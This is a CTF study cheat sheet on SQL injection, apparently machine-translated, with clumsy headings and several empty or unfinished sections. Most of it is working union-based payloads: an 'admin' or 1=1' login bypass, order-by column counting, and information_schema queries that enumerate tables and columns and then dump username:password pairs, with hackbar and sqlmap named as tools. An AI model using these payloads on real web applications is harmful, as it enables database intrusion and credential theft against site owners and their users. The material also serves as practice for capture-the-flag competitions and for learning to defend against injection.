[CTF] SQL injection summary

1. SQL injection ideas

Field
echo
library
table
column
flag

1. Universal password login
2. After login, use joint query to inject
3. Explosion field
4. See echo
4. Explosion database
3. Explosion database table
4. Explosion table column
5. Explosion flag

The # in the input box, directly use the hackbar address bar, you need to URL encode #, that is, replace with %23

order by burst field, error to 4, there are 4-1, that is, 3 fields

1' order by 1 #
1' order by 2 #
1' order by 3 #
1' order by 4 #

Union joint query judgment echo, where to display the data, replace the command where

1' union select 1,2,3 #

3

Burst library

1' union select 1,2,version() #

VERSION

1' union select 1,2,database() #

DATABASE，DATABASE1

Explosive table

There is only one database, which saves trouble and is directly equal

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #

Multiple databases, select one

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='DATABASE'

AAA，BBB，CCC

Column

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='AAA' #

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='BBB' # 

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='CCC' # 

id,username,password

Read content, burst flag

1' union select 1,2,group_concat(id,username,password) from AAA #

id,username,password

1' union select 1,2,group_concat(username,0x3a,password) from AAA#

username:password,username:password

Lite

Burst field

1' order by 1 #
1' order by 2 #
1' order by 3 #

1' order by 1 %23
1' order by 2 %23
1' order by 3 %23

See echo

1' union select 1,2,3 #

Burst database

1' union select 1,database(),version() #

DATABASE,VERSION

5. Burst database tables

There is only one database, which saves trouble and is directly equal

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #

Multiple databases, select one

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='DATABASE'

AAA，BBB，CCC

6. Burst out the columns of the table

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='AAA' #

7. Read the content, explode the flag

Read AAA table

1' union select 1,2,group_concat(id,username,password) from AAA%23&password=1

ASCII code can be added for easy distinction

1' union select 1,2,group_concat(username,0x40,password) from AAA%23&password=1

Two, SQL injection type

Three, skills

Universal password

admin’ or 1=1 #

Common URL encoding

#	%23

Commonly used ASCII code

0x3a
:
0x40 @

https://www.litefeel.com/tools/ascii.php

Four, tools

1 、 hackbar

Shortcut
Ctrl + Enter to execute

2、sqlmap

3. Script

Five, bypass

Not completed yet to be supplemented...